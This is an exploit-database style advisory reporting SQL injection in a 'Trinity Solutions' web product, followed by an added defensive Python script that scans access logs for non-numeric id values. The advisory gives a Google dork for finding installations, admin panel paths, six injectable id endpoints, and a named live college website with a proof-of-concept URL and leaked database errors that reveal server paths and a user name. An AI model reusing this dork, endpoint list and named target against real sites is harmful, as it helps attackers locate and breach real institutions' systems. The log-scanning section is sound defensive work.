
Trinity Solutions India SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-01-2019

# Exploit Title : Trinity Solutions India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trinitysolutions.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered by Trinity Solutions'' site:edu.in
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

######################################################

# Admin Panel Login Path :
************************

/ritcohm/admin/
[PATH]/admin/

######################################################

# SQL Injection Exploit :
**********************

[PATH]/index.php?id=[SQL Injection]

[PATH]/admin/dbinfo.php?id=[SQL Injection]

[PATH]/admin/lib/getval.php?id=[SQL Injection]

[PATH]/facilities.php?id=[SQL Injection]

[PATH]/include/right_gallery.php?id=[SQL Injection]

[PATH]/include/footerfiles.php?id=[SQL Injection]
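
Added example (not part of the original advisory): a log check a site operator can run to find requests that pass a non-numeric id value to the scripts listed above. It assumes combined-format access logs and that legitimate id values are plain decimal integers; the log lines, client addresses and the /site/ prefix are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names from the advisory's list. [PATH] is site-specific, so the
# check matches on the trailing part of the request path.
ENDPOINTS = (
    "/index.php", "/admin/dbinfo.php", "/admin/lib/getval.php",
    "/facilities.php", "/include/right_gallery.php", "/include/footerfiles.php",
)

# Assumed layout: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
NUMERIC = re.compile(r"[0-9]+")  # assumption: a valid id is a decimal integer

def suspicious_id(line):
    """Return (client, path, id_value, status) when a listed script receives
    a non-numeric id parameter, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINTS):
        return None
    # parse_qsl percent-decodes, so id=1%27 is compared as the string 1'
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "id" and not NUMERIC.fullmatch(value):
            return client, parts.path, value, status
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(suspicious_id, lines) if hit]

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0000] "GET /site/include/right_gallery.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jan/2019:10:00:05 +0000] "GET /site/include/right_gallery.php?id=1%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [08/Jan/2019:10:00:09 +0000] "GET /site/about.php?id=x HTTP/1.1" 200 900',
    '192.0.2.10 - - [08/Jan/2019:10:00:12 +0000] "GET /site/facilities.php?id=12 HTTP/1.1" 200 4400',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that was answered with a page containing the database warnings shown further down is worth prioritising, since it indicates the input reached the query.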

######################################################

# Example Vulnerable Site =>
**************************

Note => (166.62.10.139) => There are 1,479 domains hosted on this server.

[+] ritcohm.rit.edu.in/ritcohm/include/right_gallery.php?id=1%27 =>

[Proof of Concept] => archive.fo/OtUVd

######################################################

# SQL Database Error :
***********************

Deprecated: mysql_query(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/newpanelritee/public_html/ritcohm/ritcohm/include/right_gallery.php on line 12

Warning: mysql_query(): Access denied for user 'newpanelritee'@'localhost' (using password: NO) in /home/newpanelritee/public_html/ritcohm/ritcohm/include/right_gallery.php on line 12

Warning: mysql_query(): A link to the server could not be established in /home/newpanelritee/public_html/ritcohm/ritcohm/include/right_gallery.php on line 12

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/newpanelritee/public_html/ritcohm/ritcohm/include/right_gallery.php on line 13

######################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
